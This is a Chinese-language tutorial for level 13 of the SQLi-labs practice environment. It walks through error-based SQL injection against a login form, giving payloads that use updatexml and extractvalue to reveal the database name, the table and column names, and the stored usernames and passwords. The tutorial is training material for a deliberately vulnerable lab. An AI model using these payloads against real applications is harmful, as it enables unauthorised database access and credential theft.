sql_lab之sqli中的报错注入,less13
报错注入(less-13)
正常报错注入:
1.输入用户名和密码123 123显示登录错误
2.输入用户名和密码123’?123显示登录错误
123后面有’)说明是’)注入
3.查询数据库名
1')?and updatexml('<a><b></b></a>',concat('1111',database(),'1'),'1')?-- s
爆出XPATH syntax error: 'security1'
或者用1') and extractvalue('1',concat('1',database())) -- s
爆出XPATH syntax error: 'security'
4.查询表名
1') and extractvalue('1',concat('1',(select group_concat(table_name) from information_schema.tables where table_schema='SECURITY'))) -- s
5.查询users用户的字段名
1') and extractvalue('1',concat('1',(select group_concat(column_name) from information_schema.columns where table_schema='SECURITY' and table_name='users'))) -- s
6.查询username和password
输入这个
1') and extractvalue('1',concat('1',(select group_concat(username) from users))) -- s
Username结果显示
同理
1') and extractvalue('1',concat('1',(select group_concat(password) from users))) -- s
Password结果显示
注意该结果只能显示一行,所以说需要username和password分开查询,否则会出现错误
比如:
=1') and extractvalue('1',concat('1',(select group_concat(username),group_concat(password) from users))) -- s
结果为:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!